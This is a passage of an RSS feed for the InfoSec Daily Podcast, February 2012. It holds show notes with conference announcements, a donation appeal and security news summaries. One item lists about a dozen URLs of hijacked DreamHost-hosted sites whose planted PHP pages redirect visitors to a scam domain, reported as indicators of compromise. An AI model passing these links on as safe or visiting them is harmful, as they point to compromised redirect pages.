	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* WMP MIDI (CVE-2012-0003)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Why are we calling it &ldquo;zhī zhū&rdquo;? There&rsquo;s numerous references to the word &ldquo;spider&rdquo; in several of its HTML files. &ldquo;Zhī zhū&rdquo; in Chinese means spider so this is basically the Spider Exploit Pack.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://research.zscaler.com/2012/02/dreamhost-hijacked-websites-redirect-to.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://research.zscaler.com/2012/02/dreamhost-hijacked-websites-redirect-to.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following the</span><a href="http://www.zdnet.com/blog/security/dreamhost-hacked-mass-password-reset-issued/10175"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Dreamhost hack</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, that was revealed this week, many websites hosted by the company have been hijacked to redirect users to a Russian scam page.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&#39;ve identified hundreds of websites hosted by DreamHost that contained a PHP page redirecting to </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">hxxp://www.otvetvam.com/</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Here are a few examples:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://www.lciva.com/wp-content/plugins/extended-comment-options/gyrewnv.php</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://honorboundphoto.net/photos/10007-mankato_habitat_for_humanity_golf_tournament/agtruje.php</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://ryanmasters.ca/wp-content/gallery/our-kingdom/thumbs/tyiueg.php</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://treatmentofpanicattacks.com/wp-content/cache/supercache/www.treatmentofpanicattacks.com/category/anxiety-support/polzin.php</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://r4theband.co.uk/content/wp-content/themes/agregado/includes/cache/gyrewnv.php </span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://dedehaluk.com/cache/hakkinda/fgjke.php</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://www.agustindondo.co.uk/yellowbrick/wp-content/files_flutter/modules/fgjke.php </span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://dcstavclub.org/wp-content/themes/newzen_2.0_build_105/images/fgndnju.php </span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://camtarn.org/gizmoblog/content/06/03/entry060305-180312/comments/fgjke.php </span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://derek.hinchy.org/MT-5.031-en/mt-static/support/theme_static/professional_website/themes/professional-green/polzin.php</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://ojosdelmundo.dreamhosters.com/images/comprofiler/gallery/tghreig.php</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-597-isps-not-the-judge-coffee-terrorist-vikileaks-payday-zhi-zhu-dreamhost/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3521/0/infosec-daily-podcast-episode-597.mp3" length="16227770" type="audio/mpeg" />
		<itunes:duration>0:33:46</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 597 for February 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 597 for February 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://www.eff.org/deeplinks/2012/02/members-uk-parliament-recommend-censoring-online-extremism
	In a report published last week, members of the United Kingdom Parliament concluded that the Internet plays a major role in the radicalization of terrorists and called on the government to pressure Internet Service Providers in Britain and abroad to censor online speech. The Roots of Violent Radicalisation places the Internet ahead of prisons, universities, and religious establishments in propagating radical beliefs and ultimately recommends that the government &#8220;develop a code of practice for the removal of material which promotes violent extremism&#8221; binding ISPs. 
	While the Terrorism Act 2006 authorizes British law enforcement agencies to order certain material to be removed from websites, lawmakers on the Home Affairs Committee stated that &#8220;service providers themselves should be more active in monitoring the material they host.&#8221; Their report raises serious concerns that political and religious speech will be suppressed. Security expert Peter Neumann who testified before the Committee asked why websites like YouTube and Facebook can&#8217;t be as &#8220;effective at removing . . . extremist Islamist or extremist right-wing content&#8221; as they are at removing sexually explicit content or copyrighted material that violates their own terms of service.
	&#8230;
	Source: http://boingboing.net/2012/02/14/fbi-says-paying-cash-for-coffe.html
	Using cash for small purchases like a cup of coffee, gum and other items is a good indication that a person is trying to pass for normal without leaving the kind of paper trail created using a debit or credit card[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 596 &#8211; Interview with zzz and Lance James</title>
		<link>http://www.isdpodcast.com/episode-596-interview-with-zzz-and-lance-james</link>
		<comments>http://www.isdpodcast.com/episode-596-interview-with-zzz-and-lance-james#comments</comments>
		<pubDate>Fri, 17 Feb 2012 02:10:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3516</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 596 for February 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 596 for February 16, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Links:</span><br />
	<a href="http://www.i2p2.de/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.i2p2.de</span></a><br />
	<a href="https://twitter.com/#%21/i2p"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/#!/i2p</span></a><br />
	<a href="https://twitter.com/#%21/lancejssc"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/#!/lancejssc</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (protected Twitter)</span><br />
	<a href="http://www.irongeek.com/i.php?page=security/i2p-tor-workshop-notes"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.irongeek.com/i.php?page=security/i2p-tor-workshop-notes</span></a><br />
	<a href="http://irongeeks.i2p/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://irongeeks.i2p</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-596-interview-with-zzz-and-lance-james/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3516/0/infosec-daily-podcast-episode-596.mp3" length="27479649" type="audio/mpeg" />
		<itunes:duration>0:57:12</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 596 for February 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 596 for February 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Links:
	http://www.i2p2.de
	https://twitter.com/#!/i2p
	https://twitter.com/#!/lancejssc (protected Twitter)
	http://www.irongeek.com/i.php?page=security/i2p-tor-workshop-notes
	http://irongeeks.i2p</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 595 &#8211; 80vul Quality Assurance Group, BlackHole, VIPRE, Invisible Gmail &amp; Chinese Hackers</title>
		<link>http://www.isdpodcast.com/episode-595-80vul-quality-assurance-group-blackhole-vipre-invisible-gmail-chinese-hackers</link>
		<comments>http://www.isdpodcast.com/episode-595-80vul-quality-assurance-group-blackhole-vipre-invisible-gmail-chinese-hackers#comments</comments>
		<pubDate>Thu, 16 Feb 2012 01:49:05 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3512</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 595 for February 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.07688726571541438" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 595 for February 15, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
